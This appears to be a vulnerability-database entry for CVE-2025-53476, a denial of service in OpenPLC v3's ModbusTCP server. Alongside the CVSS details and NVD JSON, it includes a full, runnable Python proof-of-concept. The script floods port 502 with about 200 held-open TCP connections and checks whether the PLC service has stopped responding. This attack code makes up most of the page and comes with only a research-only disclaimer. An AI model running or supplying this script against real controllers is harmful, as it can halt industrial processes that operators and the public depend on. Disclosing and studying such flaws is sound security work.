Security Vulnerability Report
CVE-2025-53476 CVSS 5.3 MEDIUM

Published: 2025-10-07 14:15:37
Last Modified: 2026-04-15 00:35:42

Description

A denial of service vulnerability exists in the ModbusTCP server functionality of OpenPLC_v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58. A specially crafted series of network connections can lead to the server not processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

OpenPLC v3 (commit a931181e8b81e36fadf7b74d5cba99b73c3f6d58 and earlier versions)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
#!/usr/bin/env python3
# CVE-2025-53476 - OpenPLC v3 ModbusTCP Server Denial of Service PoC
# This PoC demonstrates a DoS attack against OpenPLC v3's ModbusTCP server
# by opening a series of TCP connections to exhaust server resources.

import socket
import threading
import sys
import time
import argparse

TARGET_HOST = "127.0.0.1"
TARGET_PORT = 502  # Default ModbusTCP port
NUM_CONNECTIONS = 200  # Number of concurrent connections to establish
CONNECTION_TIMEOUT = 5


def open_connection(host, port, conn_id):
    """Open a TCP connection and hold it open to exhaust server resources."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(CONNECTION_TIMEOUT)
        sock.connect((host, port))
        print(f"[+] Connection {conn_id} established to {host}:{port}")
        # Hold the connection open without sending any data
        # This will consume server-side resources (file descriptors, threads, etc.)
        time.sleep(300)
        sock.close()
    except socket.error as e:
        print(f"[-] Connection {conn_id} failed: {e}")


def verify_service_available(host, port):
    """Verify if the ModbusTCP service is still responsive."""
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(3)
        sock.connect((host, port))
        sock.close()
        return True
    except socket.error:
        return False


def main():
    parser = argparse.ArgumentParser(description="CVE-2025-53476 PoC - OpenPLC v3 ModbusTCP DoS")
    parser.add_argument("-t", "--target", default=TARGET_HOST, help="Target host IP address")
    parser.add_argument("-p", "--port", type=int, default=TARGET_PORT, help="Target ModbusTCP port")
    parser.add_argument("-c", "--connections", type=int, default=NUM_CONNECTIONS, help="Number of connections")
    args = parser.parse_args()

    print(f"[*] CVE-2025-53476 PoC - OpenPLC v3 ModbusTCP DoS")
    print(f"[*] Target: {args.target}:{args.port}")
    print(f"[*] Connections to open: {args.connections}")

    # Check if service is available before attack
    print("\n[*] Checking service availability before attack...")
    if verify_service_available(args.target, args.port):
        print("[+] Service is responsive before attack.")
    else:
        print("[-] Service is not responding. Aborting.")
        sys.exit(1)

    # Launch concurrent connections
    print(f"\n[*] Launching {args.connections} concurrent TCP connections...")
    threads = []
    for i in range(args.connections):
        t = threading.Thread(target=open_connection, args=(args.target, args.port, i + 1))
        t.daemon = True
        t.start()
        threads.append(t)
        time.sleep(0.05)  # Small delay between connection attempts

    # Wait for connections to be established
    time.sleep(10)

    # Check if service is still available after attack
    print("\n[*] Checking service availability after attack...")
    if verify_service_available(args.target, args.port):
        print("[+] Service is still responsive. DoS may not have been triggered.")
        print("[*] Try increasing the number of connections.")
    else:
        print("[!] Service is no longer responding! DoS triggered successfully.")
        print("[!] CVE-2025-53476 has been exploited.")

    print("\n[*] Press Ctrl+C to exit and close all connections.")
    try:
        while True:
            time.sleep(1)
    except KeyboardInterrupt:
        print("\n[*] Closing connections and exiting.")
        sys.exit(0)


if __name__ == "__main__":
    main()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53476", "sourceIdentifier": "[email protected]", "published": "2025-10-07T14:15:37.270", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A denial of service vulnerability exists in the ModbusTCP server functionality of OpenPLC _v3 a931181e8b81e36fadf7b74d5cba99b73c3f6d58. A specially crafted series of network connections can lead to the server not processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-775"}]}], "references": [{"url": "https://talosintelligence.com/vulnerability_reports/TALOS-2025-2223", "source": "[email protected]"}, {"url": "https://www.talosintelligence.com/vulnerability_reports/TALOS-2025-2223", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}